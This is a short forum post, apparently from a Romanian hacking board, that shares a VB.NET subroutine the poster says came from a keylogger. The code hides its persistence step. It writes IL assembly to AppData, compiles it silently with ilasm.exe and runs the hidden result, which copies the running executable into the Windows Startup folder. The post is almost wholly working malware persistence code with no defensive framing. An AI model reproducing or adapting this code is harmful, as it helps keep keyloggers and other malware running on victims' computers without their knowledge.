Byte-ul Posted June 14, 2015 Report Share Posted June 14, 2015 Ceva mai special gasit intr-un keylogger Public Sub ILAddToStartUp(ByVal assemblyName As String) Dim genLocation As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".il" Dim genExe As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".exe" Dim ILAsm As String = Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" Dim copied As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(Windows.Forms.Application.ExecutablePath) Try If IO.File.Exists(genLocation) Then IO.File.Delete(genLocation) 'If IO.File.Exists(genExe) Then IO.File.Delete(genExe) If IO.File.Exists(copied) Then Exit Sub Dim newLine As String = Environment.NewLine Dim source As String = Windows.Forms.Application.ExecutablePath Dim code As String = ".assembly extern mscorlib {}" & newLine & _ ".assembly extern System {" & newLine & _ " .ver 2:0:0:0" & newLine & _ " .publickeytoken = (B7 7A 5C 56 19 34 E0 89)" & newLine & _ "}" & newLine & _ ".assembly " & assemblyName & "{ .ver 1:0:1:0 }" & newLine & _ ".module " & assemblyName & ".exe" & newLine & _ ".method public static void Main() cil managed {" & newLine & _ ".maxstack 2" & newLine & _ ".entrypoint" & newLine & _ ".locals init ([0] class [mscorlib]System.Exception ex)" & newLine & _ "L_02: ldstr """ & source & """" & newLine & _ "L_07: ldstr """ & Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(source) & """" & newLine & _ "L_0c: call void [mscorlib]System.IO.File::Copy(string, string)" & newLine & _ "L_12: leave.s L_23" & newLine & _ "L_14: dup" & newLine & _ "L_1a: stloc.0" & newLine & _ "L_21: leave.s L_23" & newLine & _ "L_23: nop" & newLine & _ "L_25: ret" & newLine & _ ".try L_02 to L_14 catch [mscorlib]System.Exception handler L_14 to L_23" & newLine & _ "}" code = code.Replace("\", "\\") IO.File.WriteAllText(genLocation, code) Shell(ILAsm & " " & ChrW(34) & genLocation & ChrW(34), AppWinStyle.Hide) While Not IO.File.Exists(genExe) System.Threading.Thread.Sleep(10) End While Shell(genExe, AppWinStyle.Hide) While Not IO.File.Exists(copied) System.Threading.Thread.Sleep(10) End While IO.File.Delete(genLocation) Catch ex As Exception End TryEnd Sub Quote Link to comment Share on other sites More sharing options...